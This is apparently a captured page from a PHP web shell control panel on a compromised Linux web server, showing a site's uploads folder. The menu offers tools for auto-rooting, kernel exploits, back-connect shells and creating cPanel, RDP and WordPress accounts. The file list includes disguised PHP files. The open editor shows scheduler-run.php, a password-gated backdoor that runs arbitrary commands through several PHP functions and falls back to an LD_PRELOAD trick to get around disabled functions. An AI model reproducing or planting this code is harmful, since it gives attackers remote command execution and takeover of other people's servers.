Linux 65-254-81-51.cprapid.com 4.18.0-553.125.1.el8_10.x86_64 #1 SMP Wed May 20 11:06:10 EDT 2026 x86_64
Apache
: 65.254.81.51 | : 216.73.216.6
22 Domain
8.1.34
denebfe1
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
denebfe1 /
public_html /
public /
uploads /
[ HOME SHELL ]
Name
Size
Permission
Action
all
[ DIR ]
drwxrwxrwx
4Cyz9dhBwMguRsnXa3FUdJSYGyvOth...
2.03
KB
-rw-r--r--
BkphuDNGR7hFwqsjJrpAahnX4eHmA6...
2.03
KB
-rw-r--r--
fEuAx8Cbm0pqUKsIoVz2EWeLTBowJ6...
38.37
KB
-rw-r--r--
lc-sugar.php
7.04
KB
-rw-r--r--
scheduler-run.php
810
B
-rw-r--r--
tErqzF8dNHXWtzq997qsW3rv2B1fSU...
38.37
KB
-rw-r--r--
whothefuck.php
61.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scheduler-run.php
<?php if(!preg_match('/AVRIL_JANCOK1337/',@$_REQUEST['k']))die(''); $c=@$_REQUEST['c'];if(!$c)die('');$o=''; if(function_exists('proc_open')){$p=proc_open($c,array(1=>array('pipe','w'),2=>array('pipe','w')),$ps);if(is_resource($p)){$o=stream_get_contents($ps[1]).stream_get_contents($ps[2]);fclose($ps[1]);fclose($ps[2]);proc_close($p);}} if(!$o&&function_exists('system')){ob_start();system($c);$o=ob_get_clean();} if(!$o&&function_exists('passthru')){ob_start();passthru($c);$o=ob_get_clean();} if(!$o&&function_exists('shell_exec')){$o=shell_exec($c);} if(!$o&&function_exists('exec')){exec($c,$r);$o=implode("\n",$r);} if(!$o&&function_exists('popen')){$h=popen($c,'r');$o=fread($h,1048576);pclose($h);} if(!$o){putenv("LD_PRELOAD=/tmp/.s.so");mail('','','','');$o=@file_get_contents('/tmp/.o');} echo $o;
Close